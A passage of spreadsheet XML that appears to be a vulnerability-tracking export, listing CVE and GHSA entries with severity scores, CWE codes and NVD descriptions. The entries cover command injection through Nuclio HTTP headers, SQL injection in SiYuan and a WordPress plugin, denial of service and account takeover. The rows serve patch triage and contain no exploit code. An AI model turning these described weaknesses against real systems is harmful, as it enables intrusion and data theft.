      </c>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr"/>
      <c r="Q238" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.17.4, the fix for unauthenticated OS command injection in the nuclio dashboard on the local/Docker platform is incomplete. The fix added validateFunctionName for function names and common.Quote() for the named-resource shell command path, but the list-all resource path (triggered when no specific resource name is provided) still interpolates the resourceNamespace parameter unquoted into a /bin/sh -c command string. An unauthenticated attacker can inject shell metacharacters via the X-Nuclio-Function-Namespace, X-Nuclio-Project-Namespace, or X-Nuclio-Function-Event-Namespace HTTP headers to achieve arbitrary command execution inside the dashboard container. This issue has been patched in version 1.17.4.</t>
        </is>
      </c>
      <c r="S238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79756</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79989</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>7004884b-51e2-48e8-b4a2-5ca29e80453e</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr"/>
      <c r="K239" s="5" t="inlineStr"/>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr"/>
      <c r="Q239" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>The vulnerability allows any authenticated user to change their own password without providing the current password or having an active elevated session. It also allows the attacker to change other users’ passwords if the attacker’s account has Edit users permission (which doesn’t allow changing others’ passwords) and lacks Administrate users permission (which is required to change others’ passwords).</t>
        </is>
      </c>
      <c r="S239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79989</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81640</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr"/>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr"/>
      <c r="Q240" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>An attacker could derive the camera's Wi-Fi password and connect to its wireless network. This weakens or eliminates the security value of the access-point password and may expose the live video stream, device services, status interfaces, and firmware-update functionality.</t>
        </is>
      </c>
      <c r="S240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81640</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84304</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr"/>
      <c r="K241" s="5" t="inlineStr"/>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr"/>
      <c r="Q241" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>gRPC-Go is</t>
        </is>
      </c>
      <c r="S241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84304</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86199</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr"/>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr"/>
      <c r="Q242" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.43.1 fail to properly validate the Certificate field during offline login authentication. Unauthenticated players can trigger an uninitialized property access error that crashes the server.</t>
        </is>
      </c>
      <c r="S242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86199</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86201</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr"/>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr"/>
      <c r="Q243" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 5.41.1 contains a denial of service vulnerability in LoginPacket processing where large or complex structures in unknown clientData JWT properties cause excessive logging without sanitization. Attackers can send crafted LoginPackets with deeply nested or massive object structures to trigger out-of-memory conditions and crash the server.</t>
        </is>
      </c>
      <c r="S243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86201</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86428</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr">
        <is>
          <t>thephpleague:commonmark</t>
        </is>
      </c>
      <c r="L244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr"/>
      <c r="Q244" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>commonmark versions from 1.5.0 before 2.10.0 contain a denial of service vulnerability in the AttributesExtension when processing distinctly-named attributes. Attackers can submit Markdown with numerous distinct attribute names to cause quadratic-time attribute merging and filtering, consuming disproportionate CPU resources and preventing legitimate requests from completing.</t>
        </is>
      </c>
      <c r="S244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86428</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86435</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr"/>
      <c r="K245" s="5" t="inlineStr"/>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr"/>
      <c r="Q245" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>commonmark versions from 1.5.0 before 2.8.4 contain a denial of service vulnerability in the Footnote extension that fails to deduplicate footnote definitions. Attackers can craft documents with duplicate footnote definitions and references to create quadratic output expansion, consuming excessive memory and CPU to exhaust server resources.</t>
        </is>
      </c>
      <c r="S245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86435</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87807</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr"/>
      <c r="K246" s="5" t="inlineStr"/>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr"/>
      <c r="Q246" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>siyuan versions before v3.8.2 contain an authenticated SQL injection vulnerability in the fullTextSearchBlock endpoint's method=1 query parameter. Attackers can inject UNION SELECT statements to read the entire blocks table, bypassing publish-access controls and exposing all document content and sensitive attributes.</t>
        </is>
      </c>
      <c r="S246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87807</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87808</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr"/>
      <c r="K247" s="5" t="inlineStr"/>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr"/>
      <c r="Q247" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions &lt;= 3.8.1 contain an incomplete fix for CVE-2026-32767 (GHSA-j7wh-x834-p3r7). The prior fix (commit d5e2d0bc) added an administrator check for SQL mode (method=2) in POST /api/search/fullTextSearchBlock, but the endpoint still does not enforce the application's read-only boundary: for method=2 it forwards caller-supplied SQL to the blocks database query path without calling model.CheckReadonly or CheckReadonlyStatementInBox. As a result, when a workspace runs in read-only mode (--readonly=true), an authenticated administrator can submit arbitrary SQL through /api/search/fullTextSearchBlock and obtain raw read access to the blocks database, even though the dedicated /api/query/sql endpoint is blocked in that mode. Fixed in v3.8.2.</t>
        </is>
      </c>
      <c r="S247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87808</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87816</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr"/>
      <c r="K248" s="5" t="inlineStr"/>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr"/>
      <c r="Q248" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>PasswordPusher before 2.11.1 contains a time-of-check-to-time-of-use race condition in view limit enforcement that allows unauthenticated attackers to bypass expire_after_views limits. Attackers can send concurrent requests to the show endpoint to access one-time secrets multiple times before the view count is incremented and the push expires.</t>
        </is>
      </c>
      <c r="S248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87816</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87817</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr"/>
      <c r="K249" s="5" t="inlineStr">
        <is>
          <t>gitpython_project:gitpython</t>
        </is>
      </c>
      <c r="L249" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M249" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr"/>
      <c r="Q249" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R249"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S249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87817</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87822</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr"/>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr"/>
      <c r="Q250" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>t-digest versions 3.1 through 3.3 fail to validate centroid means during deserialization in MergingDigest.fromBytes, allowing attackers to inject NaN values that bypass validation checks. Attackers can craft malicious serialized digests containing NaN centroids that degrade sorting performance from O(n log n) to O(n squared), causing severe processing delays during merge operations.</t>
        </is>
      </c>
      <c r="S250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87822</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87995</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr"/>
      <c r="K251" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L251" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr"/>
      <c r="Q251" s="5" t="inlineStr">
        <is>
          <t>CWE-1021, CWE-79</t>
        </is>
      </c>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.8.11 until 0.11.1, src/lib/components/chat/FileNav/PortPreview.svelte rendered terminal port content in an iframe sandbox containing both allow-scripts and allow-same-origin. Because the terminal proxy serves that content from the Open WebUI origin, an authenticated user with access to a shared terminal server could host script on a previewed port and take over a victim's account when the victim opened the preview. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87995</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>GHSA-rg7q-4223-phjw</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="inlineStr"/>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr"/>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr">
        <is>
          <t>composer:wwbn/avideo</t>
        </is>
      </c>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr"/>
      <c r="P252" s="5" t="inlineStr"/>
      <c r="Q252" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-wprj-9cvc-5w37. This link is maintained to preserve external references.
### Original Description
AVideo through version 26.0 contains multiple unauthenticated list.json.php endpoints in payment plugins lacking authorization checks, exposing PayPal tokens, Authorize.Net webhooks, and Bitcoin transaction records. Unauthenticated attackers can retrieve all payment transaction data including agreement IDs, user financial records, and API responses via direct GET requests to vulnerable endpoints.</t>
        </is>
      </c>
      <c r="S252" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-rg7q-4223-phjw</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14962</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr"/>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr"/>
      <c r="Q253" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>The ELEX WooCommerce Request a Quote WordPress plugin before 2.4.1 does not properly sanitise and escape a parameter before using it in a SQL query, allowing unauthenticated users to perform SQL injection attacks and extract arbitrary data from the database.</t>
        </is>
      </c>
      <c r="S253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14962</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19233</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>cybersecurity@se.com</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr"/>
      <c r="K254" s="5" t="inlineStr"/>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr"/>
      <c r="Q254" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>CWE-918: Server-Side Request Forgery (SSRF) vulnerability exists that could cause unauthorized command execution and disclosure of server data when an attacker with a privileged account sends crafted, unvalidated parameters to a server endpoint.</t>
        </is>
      </c>
      <c r="S254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19233</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
